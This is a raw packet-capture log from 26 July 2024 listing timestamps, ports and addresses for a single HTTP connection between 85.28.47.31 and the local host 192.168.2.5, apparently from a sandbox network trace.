Jul 26, 2024 17:56:13.409600973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.409612894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.409624100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.409636021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.409641981 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.409652948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.409665108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.409674883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.409682989 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.409687042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.409701109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.409707069 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.409713030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.409723997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.409723997 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.409737110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.409745932 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.409766912 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.409794092 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.410496950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.410509109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.410518885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.410531044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.410541058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.410552979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.410563946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.410574913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.410577059 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.410586119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.410598993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.410598993 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.410609007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.410619020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.410619974 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.410630941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.410639048 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.410665035 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.410691977 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.411442995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.411454916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.411463976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.411475897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.411487103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.411498070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.411506891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.411509037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.411520004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.411530972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.411540985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.411546946 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.411552906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.411564112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.411567926 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.411573887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.411583900 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.411603928 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.411629915 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.412321091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.412332058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.412342072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.412353992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.412364960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.412377119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.412386894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.412389040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.412400007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.412410975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.412412882 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.412434101 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.412456036 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.413083076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.413096905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.413105965 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.413204908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.414875031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.494007111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.494100094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.494110107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.494133949 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.494173050 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.494200945 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.494652987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.494662046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.494671106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.494680882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.494704008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.494740963 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.494765043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.494791031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.494798899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.494812012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.494853020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.494945049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.494956017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.494965076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.494975090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.494991064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.495022058 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.495089054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.495134115 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.495177031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.495187998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.495198011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.495208979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.495218039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.495225906 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.495228052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.495249033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.495273113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.495524883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.495536089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.495547056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.495563984 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.495594978 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.495665073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.495704889 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.495779991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.495790958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.495799065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.495804071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.495815039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.495817900 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.495825052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.495835066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.495841026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.495845079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.495856047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.495873928 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.495898008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.496381998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.496392012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.496401072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.496412039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.496423006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.496433020 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.496440887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.496442080 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.496452093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.496462107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.496470928 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.496473074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.496470928 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.496493101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.496504068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.496514082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.496525049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.496526957 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.496526957 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.496536016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.496551991 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.496575117 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.497438908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.497447968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.497457027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.497467041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.497476101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.497488022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.497493982 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.497503996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.497514009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.497523069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.497529030 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.497529030 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.497534037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.497545958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.497556925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.497556925 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.497565985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.497576952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.497579098 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.497587919 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.497596979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.497600079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.497606993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.497617006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.497621059 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.497627020 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.497641087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.497673035 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.498194933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.498204947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.498214006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.498224020 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.498234034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.498239040 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.498244047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.498254061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.498262882 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.498270035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.498280048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.498289108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.498300076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.498308897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.498313904 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.498313904 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.498318911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.498330116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.498339891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.498342991 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.498343945 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.498349905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.498361111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.498370886 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.498389006 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.498402119 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.499207020 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.499218941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.499227047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.499237061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.499245882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.499255896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.499262094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.499265909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.499275923 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.499285936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.499290943 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.499295950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.499305964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.499311924 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.499315977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.499325991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.499327898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.499336004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.499346972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.499355078 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.499356031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.499366999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.499376059 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.499377012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.499393940 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.499412060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.499443054 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.500013113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.500024080 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.500032902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.500044107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.500052929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.500076056 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.500098944 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.584171057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.584183931 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.584274054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.584283113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.584292889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.584299088 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.584301949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.584312916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.584320068 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.584359884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.584734917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.584745884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.584758043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.584769011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.584779024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.584789991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.584789991 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.584801912 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.584841967 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.584922075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.584930897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.584939957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.584949017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.584959030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.584960938 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.584969044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.584980011 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.584980011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.584990025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.585000992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.585006952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.585009098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.585019112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.585031986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.585040092 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.585057020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.585086107 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.585547924 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.585557938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.585566044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.585580111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.585589886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.585592985 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.585598946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.585608959 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.585618973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.585624933 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.585628986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.585639954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.585649014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.585650921 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.585658073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.585668087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.585671902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.585678101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.585688114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.585696936 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.585697889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.585707903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.585711956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.585719109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.585730076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.585736990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.585737944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.585758924 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.585776091 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.586549044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.586565971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.586577892 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.586587906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.586599112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.586608887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.586613894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.586620092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.586623907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.586628914 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.586635113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.586648941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.586658001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.586669922 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.586678982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.586685896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.586689949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.586700916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.586711884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.586713076 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.586723089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.586733103 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.586734056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.586745024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.586750984 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.586787939 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:13.587517977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:13.587528944 CEST	80	49704	85.28.47.31	192.168.2.5
